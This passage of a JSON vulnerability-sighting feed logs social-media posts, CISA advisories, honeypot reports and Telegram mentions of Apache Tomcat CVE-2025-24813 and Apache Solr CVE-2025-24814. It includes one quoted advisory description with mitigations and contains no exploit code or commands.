"2025-01-28T05:15:51.919404Z"}, {"uuid": "12ab80f6-38a5-4961-824e-e26cf6565fab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lgpx52oyws22", "content": "", "creation_timestamp": "2025-01-27T12:32:50.287595Z"}, {"uuid": "8e06f3d7-70c6-42ed-8cb6-8977de9f61b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgpy3rvop22e", "content": "", "creation_timestamp": "2025-01-27T12:49:58.261986Z"}, {"uuid": "8ac8eba3-b200-4839-8684-7c904ce0dbfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/threatcodex/statuses/114258768746288578", "content": "", "creation_timestamp": "2025-03-31T19:47:31.268002Z"}, {"uuid": "7900cfd4-62f8-41f8-8eab-5110b5ccff8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lgsnj4fmws2f", "content": "", "creation_timestamp": "2025-01-28T14:18:34.346636Z"}, {"uuid": "62beafea-9959-475e-a103-6b5614d5a0a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "83d6dcf9-4c7a-422c-ab11-48a253e8b114", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lkeet3qls42e", "content": "", "creation_timestamp": "2025-03-14T19:46:34.764631Z"}, {"uuid": "88e8e15e-7a3d-4f4f-aecf-310f5f463e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/n0n_zer0/statuses/114197263247775331", "content": "", "creation_timestamp": "2025-03-20T23:06:59.715247Z"}, {"uuid": "5f25ceb5-1349-4a80-85b1-37db3058d7cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lk4vwkzlsw2n", "content": "", "creation_timestamp": "2025-03-11T20:31:27.070494Z"}, {"uuid": "5c346278-f597-4ef6-8f77-5a3af3a0cbf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pvynckier.bsky.social/post/3lkivjsb7nc2a", "content": "", "creation_timestamp": "2025-03-16T14:56:17.208621Z"}, {"uuid": "c05f6935-c34f-47f7-a493-359eb1c56f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lk4ws2b6kw2r", "content": "", "creation_timestamp": "2025-03-11T20:46:49.191138Z"}, {"uuid": "81edc58c-6e82-4edc-9d3f-1403dbb7702a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lkcu4u2mqg42", "content": "", "creation_timestamp": "2025-03-14T05:24:38.761026Z"}, {"uuid": "c5db241e-f0d6-4611-8a61-2aff1ddf5c3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html", "content": "", "creation_timestamp": "2025-03-17T16:08:00.000000Z"}, {"uuid": "cdcc9bb5-452c-49cb-9f43-5af2c1c7fa5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/youranonriots.bsky.social/post/3lklyai6nok2l", "content": "", "creation_timestamp": "2025-03-17T20:22:44.402117Z"}, {"uuid": "12c41326-c901-4960-ba47-79a0c4367f97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://swecyb.com/users/nopatience/statuses/114202520435383429", "content": "", "creation_timestamp": "2025-03-21T21:22:59.727849Z"}, {"uuid": "811c6b28-6487-4364-be1f-8b66d8a9cc0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4pcv64nbo2", "content": "", "creation_timestamp": "2025-03-24T12:10:43.922898Z"}, {"uuid": "e59ea23d-31f9-431b-9cee-eb8bf449feeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/mttaggart/statuses/114198435326327678", "content": "", "creation_timestamp": "2025-03-21T04:03:57.445977Z"}, {"uuid": "8ee0a0f7-f9bb-41cb-b214-703cb72b7a4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lkut4xkahaf2", "content": "", "creation_timestamp": "2025-03-21T08:45:23.243428Z"}, {"uuid": "cc5d8f5b-7692-4797-8666-d7660f28f921", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3nf7k3lk26", "content": "", "creation_timestamp": "2025-03-24T01:51:06.909511Z"}, {"uuid": "e5b5577c-1eca-4791-b7aa-8586bf30546d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-25)", "content": "", "creation_timestamp": "2025-03-25T00:00:00.000000Z"}, {"uuid": "907899d7-ee41-4022-bfd9-42d6564b0f15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3kejzuvc27", "content": "", "creation_timestamp": "2025-03-11T07:31:51.483229Z"}, {"uuid": "daf6ee42-ddfd-4721-9c72-c1b86ae9839c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24811", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-01", "content": "", "creation_timestamp": "2025-02-13T11:00:00.000000Z"}, {"uuid": "41b9e7b8-c665-49bc-bde1-a1dd5d91aa28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24812", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-01", "content": "", "creation_timestamp": "2025-02-13T11:00:00.000000Z"}, {"uuid": "c46c5990-1538-429f-ab94-952190fa4639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/andranglin.bsky.social/post/3lkko4phha22c", "content": "", "creation_timestamp": "2025-03-17T07:49:00.766180Z"}, {"uuid": "40d48a1f-4239-461f-9b9d-08ec61031fff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lkpy7mgkkqi2", "content": "", "creation_timestamp": "2025-03-19T10:33:16.370002Z"}, {"uuid": "a66b0cd1-197a-4b99-acd2-12cfa864afd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkohmij6d225", "content": "", "creation_timestamp": "2025-03-18T20:03:15.708417Z"}, {"uuid": "c4326410-e211-413d-98df-f1d4ab407896", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "3c260f70-9e91-4ff8-8df9-ac03735ecbec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkohwaqotk25", "content": "", "creation_timestamp": "2025-03-18T20:08:42.784555Z"}, {"uuid": "4d2baed8-3de8-429f-982c-cd27d4773a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3lk5prjizek2u", "content": "", "creation_timestamp": "2025-03-12T04:13:57.542507Z"}, {"uuid": "6c79ca89-6066-4f20-81a1-45e7a9407543", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkmngymmoo2e", "content": "", "creation_timestamp": "2025-03-18T02:42:10.345464Z"}, {"uuid": "36d67b89-5ffc-4832-98c9-62bf4a05ab96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkmq7myec22n", "content": "", "creation_timestamp": "2025-03-18T03:31:45.645394Z"}, {"uuid": "0a89262d-3e7b-49c5-8876-4595778b4c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://ioc.exchange/users/83r71n/statuses/114143314179969928", "content": "", "creation_timestamp": "2025-03-11T10:25:55.294566Z"}, {"uuid": "a3dfbfdc-6c22-4c73-bfa7-6c24e70340da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/114143453138863016", "content": "", "creation_timestamp": "2025-03-11T11:01:14.702052Z"}, {"uuid": "bcd0d309-6014-481c-9757-39b0b42d4258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/catc0n/statuses/114189217690725779", "content": "", "creation_timestamp": "2025-03-19T12:59:46.421658Z"}, {"uuid": "caee3fe5-302d-4725-a692-66d29fdb8ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/chrisshort.net/post/3lktaeihrlv2m", "content": "", "creation_timestamp": "2025-03-20T17:36:45.869904Z"}, {"uuid": "307100c0-1850-48eb-8b50-5596497cc87b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://hachyderm.io/users/ChrisShort/statuses/114195969189490845", "content": "", "creation_timestamp": "2025-03-20T17:36:46.447316Z"}, {"uuid": "638017c0-15f5-4603-8857-5858e4ca2869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://ioc.exchange/users/83r71n/statuses/114143544837442707", "content": "", "creation_timestamp": "2025-03-11T11:24:35.572435Z"}, {"uuid": "7543e4c7-d94a-47b2-b055-e2069b122b60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3lkfy6qjt5kz2", "content": "", "creation_timestamp": "2025-03-15T11:07:50.010767Z"}, {"uuid": "b352400f-a300-4790-bb2b-df4925523062", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3lkg2tnetdiz2", "content": "", "creation_timestamp": "2025-03-15T11:53:18.011605Z"}, {"uuid": "fd6791d9-c048-474e-bdcd-ada8ece286eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lk454cteps2i", "content": "", "creation_timestamp": "2025-03-11T13:07:18.339853Z"}, {"uuid": "fbfbda36-3e9f-4cf6-a20a-345bfc98c3c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/netmarkjp.bsky.social/post/3lkoxy3dimj2u", "content": "", "creation_timestamp": "2025-03-19T00:56:00.299952Z"}, {"uuid": "fad6798a-0c10-4c37-8af2-55620aef4f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/bleepingcomputer.com/post/3lklb5harvz2v", "content": "", "creation_timestamp": "2025-03-17T13:29:25.304322Z"}, {"uuid": "3914bc90-e78c-4160-a3e0-357b9604dea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114178045232050618", "content": "", "creation_timestamp": "2025-03-17T13:38:28.384356Z"}, {"uuid": "fd861e51-3954-414d-87e7-1d693f8f1ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3ll576k7rd72w", "content": "", "creation_timestamp": "2025-03-24T16:42:10.225837Z"}, {"uuid": "fdd69280-6ae1-4416-9a91-9134126dc53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "720a5a0b-5fec-4cb5-bec1-52652a51d703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/114194414306800739", "content": "", "creation_timestamp": "2025-03-20T11:01:20.424359Z"}, {"uuid": "49a4d748-38e6-4081-a743-23720c239d60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll57ozb7rq72", "content": "", "creation_timestamp": "2025-03-24T16:51:33.975362Z"}, {"uuid": "7b7f8c25-2a87-4615-a33f-796370cf392d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3ll5abc5rjs23", "content": "", "creation_timestamp": "2025-03-24T17:01:36.066839Z"}, {"uuid": "9831519b-83a6-4dbb-9eb3-444935629793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lk252mlvak22", "content": "", "creation_timestamp": "2025-03-10T18:00:59.989007Z"}, {"uuid": "35355bf7-da6f-47a3-9774-4e96170396ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/GossiTheDog.cyberplace.social.ap.brid.gy/post/3lkquvbcpvwl2", "content": "", "creation_timestamp": "2025-03-19T19:06:14.271914Z"}, {"uuid": "aa352358-6ec2-45aa-a5ad-55c8589b6e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://cyberplace.social/users/GossiTheDog/statuses/114190657188083494", "content": "", "creation_timestamp": "2025-03-19T19:06:16.562566Z"}, {"uuid": "6cd9b16c-cf64-47bf-b47c-9368f242d288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://threatintel.cc/2025/03/14/one-put-request-to-own.html", "content": "", "creation_timestamp": "2025-03-14T10:04:25.000000Z"}, {"uuid": "2ce36026-7f30-4d94-b7bd-dd735eae4ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lkxleuja7k2z", "content": "", "creation_timestamp": "2025-03-22T11:04:31.046797Z"}, {"uuid": "6c160b33-d45d-442d-b748-f43c7bbf3f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lkxlfdsekk2z", "content": "", "creation_timestamp": "2025-03-22T11:04:47.840629Z"}, {"uuid": "3682aa9e-b1c4-4809-a60e-1a2743fda8c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/3702835", "content": "", "creation_timestamp": "2025-04-01T21:15:12.703588Z"}, {"uuid": "a06562c5-afca-4136-aae3-e3fa6b3275e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/3702835", "content": "", "creation_timestamp": "2025-04-01T21:15:12.710846Z"}, {"uuid": "48edb260-b575-4059-ae60-51b7d6a8051f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/andranglin.bsky.social/post/3llsyaqnq5c2v", "content": "", "creation_timestamp": "2025-04-02T08:36:45.993057Z"}, {"uuid": "01975166-99c0-46bf-8a00-1f74e39bcf1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3llrjs754642a", "content": "", "creation_timestamp": "2025-04-01T18:45:21.571180Z"}, {"uuid": "7dbad172-56dc-41a0-9f8e-209b7279bf51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114268459075525163", "content": "", "creation_timestamp": "2025-04-02T12:51:54.437904Z"}, {"uuid": "d4ca329d-1ec5-4311-bcf6-59d9ccc14aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114268459075525163", "content": "", "creation_timestamp": "2025-04-02T12:51:54.447112Z"}, {"uuid": "189ed584-ae19-4f3b-ab24-c24288856de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llsoznh4us2h", "content": "", "creation_timestamp": "2025-04-02T05:51:40.253533Z"}, {"uuid": "02875eff-2404-4155-abbc-082be253220d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3lljp6bprsc2m", "content": "", "creation_timestamp": "2025-03-29T16:00:20.040407Z"}, {"uuid": "b58c8900-dd29-4896-9bf0-b6943cb20b01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3llkq3fw2rk2b", "content": "", "creation_timestamp": "2025-03-30T01:49:16.838471Z"}, {"uuid": "d097d0eb-0a31-48bb-9fd9-acb972a6912b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://gist.github.com/meysam81/19c3a6625443716b623ff8ea018112d3", "content": "", "creation_timestamp": "2025-04-22T04:54:19.000000Z"}, {"uuid": "20c9a430-8a4d-4b7e-b09d-2d0a79703c1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24814", "type": "seen", "source": "https://t.me/cvedetector/16448", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24814 - Apache Solr Plugin Code Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24814 \nPublished : Jan. 27, 2025, 9:15 a.m. | 1\u00a0hour, 13\u00a0minutes ago \nDescription : Core creation allows users to replace \"trusted\" configset files with arbitrary configuration  \n  \nSolr instances that (1) use the \"FileSystemConfigSetService\" component (the default in \"standalone\" or \"user-managed\" mode), and (2) are running without authentication and authorization are vulnerable to a sort of privilege escalation wherein individual \"trusted\" configset files can be ignored in favor of potentially-untrusted replacements available elsewhere on the filesystem.\u00a0 These replacement config files are treated as \"trusted\" and can use \"\" tags to add to Solr's classpath, which an attacker might use to load malicious code as a searchComponent or other plugin.  \n  \nThis issue affects all Apache Solr versions up through Solr 9.7.\u00a0 Users can protect against the vulnerability by enabling authentication and authorization on their Solr clusters or switching to SolrCloud (and away from \"FileSystemConfigSetService\").\u00a0 Users are also recommended to upgrade to Solr 9.8.0, which mitigates this issue by disabling use of \"\" tags by default. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"27 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-27T11:48:53.000000Z"}, {"uuid": "636bb27b-9603-445b-9b9b-6c4dc7b0c631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/MalaysiaHacktivistz/10097", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T13:04:33.000000Z"}, {"uuid": "4868ccac-fbb2-46d2-bfd1-79db1d414dee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/MalaysiaHacktivistz/2720", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T13:04:33.000000Z"}, {"uuid": "a4f7d93d-3b41-43ea-8fc5-ad541f28a7f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "Telegram/yhcYpvZu6Bxlq8Hsef2NCCJ6Tsk6IKBWDKd0PNM5ciaL3Q", "content": "", "creation_timestamp": "2025-03-17T20:41:23.000000Z"}, {"uuid": "32358b10-155f-4e49-8bc7-dcf351b64801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/3-ZHnGIziHQfiAv_nnRcq-K1CX5YmX9HY0dHsXamLuxzSs0", "content": "", "creation_timestamp": "2025-04-09T23:00:06.000000Z"}, {"uuid": "b7126334-96bb-4441-86d6-3e615bcb9748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1702", "content": "Path Equivalence- 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write 